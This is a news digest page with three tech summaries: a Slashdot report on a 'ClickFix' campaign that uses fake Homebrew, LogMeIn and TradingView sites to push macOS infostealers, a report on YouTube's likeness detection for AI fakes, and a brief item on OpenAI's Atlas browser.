Skip to main content

Fake Homebrew Google Ads Push Malware Onto macOS

2 weeks 1 day ago
joshuark shares a report from BleepingComputer: A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. The campaign employs "ClickFix" techniques where targets are tricked into executing commands in Terminal, infecting themselves with malware. Researchers at threat hunting company Hunt.io identified more than 85 domains impersonating the three platforms in this campaign [...]. When checking some of the domains, BleepingComputer discovered that in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results. The malicious sites feature convincing download portals for the fake apps and instruct users to copy a curl command in their Terminal to install them, the researchers say. In other cases, like for TradingView, the malicious commands are presented as a "connection security confirmation step." However, if the user clicks on the 'copy' button, a base64-encoded installation command is delivered to the clipboard instead of the displayed Cloudflare verification ID.

Read more of this story at Slashdot.

BeauHD

YouTube's Likeness Detection Has Arrived To Help Stop AI Doppelgangers

2 weeks 1 day ago
An anonymous reader quotes a report from Ars Technica: AI content has proliferated across the Internet over the past few years, but those early confabulations with mutated hands have evolved into synthetic images and videos that can be hard to differentiate from reality. Having helped to create this problem, Google has some responsibility to keep AI video in check on YouTube. To that end, the company has started rolling out its promised likeness detection system for creators. [...] The likeness detection tool, which is similar to the site's copyright detection system, has now expanded beyond the initial small group of testers. YouTube says the first batch of eligible creators have been notified that they can use likeness detection, but interested parties will need to hand Google even more personal information to get protection from AI fakes. Currently, likeness detection is a beta feature in limited testing, so not all creators will see it as an option in YouTube Studio. When it does appear, it will be tucked into the existing "Content detection" menu. In YouTube's demo video, the setup flow appears to assume the channel has only a single host whose likeness needs protection. That person must verify their identity, which requires a photo of a government ID and a video of their face. It's unclear why YouTube needs this data in addition to the videos people have already posted with their oh-so stealable faces, but rules are rules. After signing up, YouTube will flag videos from other channels that appear to have the user's face. YouTube's algorithm can't know for sure what is and is not an AI video. So some of the face match results may be false positives from channels that have used a short clip under fair use guidelines. If creators do spot an AI fake, they can add some details and submit a report in a few minutes. If the video includes content copied from the creator's channel that does not adhere to fair use guidelines, YouTube suggests also submitting a copyright removal request. However, just because a person's likeness appears in an AI video does not necessarily mean YouTube will remove it.

Read more of this story at Slashdot.

BeauHD

OpenAI releases bot-tom feeding browser with ChatGPT built in

2 weeks 1 day ago
Why experience the web for yourself when there's so much privacy to surrender?

In a bid to grab even more eyeballs, OpenAI has finally released Atlas, its long-teased, ChatGPT-powered web browser. Surfing the web may never be the same now that a bot is doing it for you – while training itself at the same time.…

Thomas Claburn